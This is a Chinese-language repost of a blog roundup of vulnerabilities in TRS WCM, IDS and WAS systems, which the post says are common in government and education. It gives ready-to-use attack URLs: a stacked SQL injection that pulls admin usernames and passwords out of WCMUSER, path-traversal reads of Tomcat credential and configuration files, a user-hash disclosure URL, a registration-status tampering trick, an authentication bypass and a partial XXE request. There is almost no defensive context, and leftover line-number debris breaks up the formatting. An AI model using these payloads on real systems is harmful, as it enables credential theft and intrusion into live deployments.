TRS漏洞整理 (转发)

× 文章目录
  1. 1. 0x00 前言
  2. 2. 0x01 WCM内容管理系统
    1. 2.1. 1.1 WCM5.2~WCM6.5存在SQL注入
    2. 2.2. 1.6 WCM全版本任意文件写入漏洞
  3. 3. 0x02 IDS身份管理系统
    1. 3.1. 2.1 IDS系统任意文件读取和信息泄露漏洞
    2. 3.2. 2.2 XXE漏洞
  4. 4. 0x03 WAS文本检索系统
    1. 4.1. 3.1 WAS未授权访问
    2. 4.2. 3.2 未授权发布信息
  5. 5. 0x04 WAS任意文件读取
  6. 6. 0x05 WAS任意文件下载漏洞
  7. 7. 0x06 WAS任意文件写入

转自 https://chmod.cf/2017/06/22/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/

0x00 前言

TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下

0x01 WCM内容管理系统

1.1 WCM5.2~WCM6.5存在SQL注入

首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp

直接注入

1
2
3
4
5
6
7
8
9
10
http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG

http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
```

注:存在注入参数为:`OrderType`和`OrderField`

### 1.2 [WCM任意文件下载漏洞](WCM任意文件下载漏洞)

漏洞存在于`wcm/app/system/read_image.jsp`读取上传图片功能处,可构造链接下载任意文件,列如

http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml

1
2
3
4
5
6
7
8

读取`tomcat`配置文件

### 1.3 [WCM6.x系列用户密码泄漏](WCM6.x系列用户密码泄漏)

TRS WCM 6.0以上版本某个功能页面调用`service`限制不严格,可以获取后台管理用户的用户名和密码序列。

访问链接:

HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers

1
2
3
4
5
6

WCM的密码加密方式是:常规`32`位`MD5`取前`15`位;

如果只访问`wcm/infoview.do`,尽管是个错误页面,比如:

首先访问

http://xx.xx.xx/wcm/infoview.do

1
2

然后你再访问:

http://xx.xx.xx/wcm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

### 1.4 [WCM用户注册逻辑漏洞](WCM用户注册逻辑漏洞)

问题出在`wcm/console/auth/reg_newuser.jsp`文件中

即将随意表单改成`STATUS`值为`30`,或增加`STATUS`字段表单。

然后提交注册

虽然说是“请等待开通!”,但实际上已经开通了,因为`STATUS`字段已经改成正常了。

直接登陆

虽然没什么权限,但后台存在大量注入等漏洞

可以通过注入直接操作数据库了。

http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

1
2
3
4
5
6

### 1.5 [WCM6权限绕过](WCM6权限绕过)

首先访问wcm目录,会自动跳转到登录页面

在网址后加上查看管理员密码的链接:

wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
`

之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题

这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了

1.6 WCM全版本任意文件写入漏洞

这个是16年年初出的漏洞,当初协助北京公司做过一次排查。

是利用webservicesimportDocuments接口匿名访问,加上畸形文件名进行利用,未找到poc

0x02 IDS身份管理系统

2.1 IDS系统任意文件读取和信息泄露漏洞

漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可

2.2 XXE漏洞

使用DNS Log进行记录

POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1988224119974
Content-Length: 196
]>&xxe;

参考资料

0x03 WAS文本检索系统

3.1 WAS未授权访问

安装目录下was40/tree文件可以看到一些后台功能

访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性

3.2 未授权发布信息

编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证

0x04 WAS任意文件读取

问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞

http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties    

0x05 WAS任意文件下载漏洞

问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,

http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud    

0x06 WAS任意文件写入

漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入

同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样